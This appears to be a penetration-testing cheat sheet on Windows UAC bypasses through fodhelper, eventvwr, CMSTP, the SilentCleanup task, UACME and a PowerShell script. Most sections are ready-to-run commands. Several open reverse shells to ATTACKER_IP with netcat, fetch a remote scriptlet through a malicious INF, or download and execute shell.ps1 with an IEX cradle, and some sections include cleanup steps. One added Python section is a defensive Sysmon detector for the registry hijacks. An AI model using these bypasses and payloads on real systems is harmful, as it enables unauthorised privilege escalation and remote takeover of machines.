## Overview
UAC (User Account Control) prompts before a process is elevated. If the user is a member of the local Administrators group but is running in a medium-integrity context, a UAC bypass reaches high integrity without that prompt being shown.
## Check UAC Status
```cmd
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
```
EnableLUA is 0 when UAC is turned off entirely; ConsentPromptBehaviorAdmin controls how members of the Administrators group are prompted:

| ConsentPromptBehaviorAdmin | Meaning |
|---|---|
| 0 | No prompt (UAC disabled) |
| 1 | Prompt on secure desktop |
| 2 | Prompt for consent |
| 5 | Default — prompt for non-Windows binaries |
## Check Current Integrity Level
```cmd
whoami /groups | findstr "Label"
```
| Label | Level |
|---|---|
| Medium Mandatory Level | Standard — UAC bypass needed |
| High Mandatory Level | Already elevated |
## fodhelper.exe
fodhelper.exe auto-elevates and, on launch, reads a registry key under HKCU that the current user controls.
```cmd
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
```
Cleanup:
```cmd
reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
```
## eventvwr.exe
Similar to fodhelper — abuses the auto-elevation of mmc.exe, which reads the mscfile handler key under HKCU.
```cmd
reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
eventvwr.exe
```
Cleanup:
```cmd
reg delete HKCU\Software\Classes\mscfile\Shell\Open\command /f
```
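Detection for the two registry hijacks above (fodhelper and eventvwr), as an added example that is not part of this page's own material: it scans Sysmon-style registry value-set events (Event ID 13, using Sysmon's Image/TargetObject/Details field names) for writes under the hijack keys. The key=value line layout and the log lines themselves are constructed for the example and are an assumption about the log source.

```python
import re
from typing import Dict, List

# Per-user registry paths written by the fodhelper and eventvwr bypasses above.
# Sysmon records an HKCU write as HKU\<user SID>\..., so match below the hive.
HIJACK_KEYS = {
    r"\software\classes\ms-settings\shell\open\command": "fodhelper",
    r"\software\classes\mscfile\shell\open\command": "eventvwr",
}

# Field pattern for a simplified key=value line layout (an assumption made for
# this example; adapt the parsing to your own log source's field names).
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_line(line: str) -> Dict[str, str]:
    """Split one key=value log line into a dict of fields."""
    return dict(FIELD_RE.findall(line.strip()))

def find_uac_hijacks(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per registry value set under a known hijack key."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if fields.get("EventID") != "13":  # 13 = Sysmon RegistryEvent (value set)
            continue
        target = fields.get("TargetObject", "")
        for key, technique in HIJACK_KEYS.items():
            if key in target.lower():
                hits.append({
                    "technique": technique,
                    "value": target.rsplit("\\", 1)[-1],   # DelegateExecute / (Default)
                    "image": fields.get("Image", ""),      # process that wrote the value
                    "data": fields.get("Details", ""),     # command that would run elevated
                })
                break
    return hits

# Constructed sample events: two values for the fodhelper hijack, one for
# eventvwr, and an unrelated Run-key write that must not fire.
SAMPLE_LINES = [
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute Details=(Empty)",
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\Shell\Open\command\(Default) Details=C:\Windows\Temp\payload.exe",
    r"EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Classes\mscfile\Shell\Open\command\(Default) Details=C:\Windows\Temp\payload.exe",
    r"EventID=13 Image=C:\Windows\explorer.exe TargetObject=HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive Details=C:\Users\alice\OneDrive.exe",
]

if __name__ == "__main__":
    for hit in find_uac_hijacks(SAMPLE_LINES):
        print(f"[{hit['technique']}] {hit['value']} set by {hit['image']}: {hit['data']}")
```

Any hit on these keys from a medium-integrity process is worth an alert, since neither fodhelper nor mmc legitimately needs a per-user ms-settings or mscfile handler; the cleanup commands above also show up as a matching delete shortly afterwards.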
## CMSTP.exe
Connection Manager Profile Installer. It loads an INF file whose install sections can run commands.
### Create Malicious INF
```ini
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://ATTACKER_IP/payload.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Bypass"
ShortSvcName="Bypass"
```
### Execute
```cmd
cmstp.exe /ni /s malicious.inf
```
## DiskCleanup (schtasks)
Hijacks the windir environment variable that the SilentCleanup scheduled task uses to locate cleanmgr.exe.
```cmd
set windir=C:\Windows\Temp & schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
```
Place the payload at:
```
C:\Windows\Temp\System32\cleanmgr.exe
```
## UACME — Automated Bypass
A collection of 70+ UAC bypass methods: https://github.com/hfiref0x/UACME
### Usage
```cmd
Akagi64.exe <method_number> "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```
Common methods:

| # | Technique | Works on |
|---|---|---|
| 23 | pkgmgr | Windows 10 |
| 33 | fodhelper | Windows 10/11 |
| 34 | DiskCleanup | Windows 10 |
| 41 | CMSTP | Windows 10 |
| 61 | sspi datagram | Windows 10/11 |
## PowerShell Script (fodhelper)
```powershell
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
```
A UAC bypass only works if the user is already a member of the Administrators group: it escalates from medium to high integrity, not from a standard user to an administrator.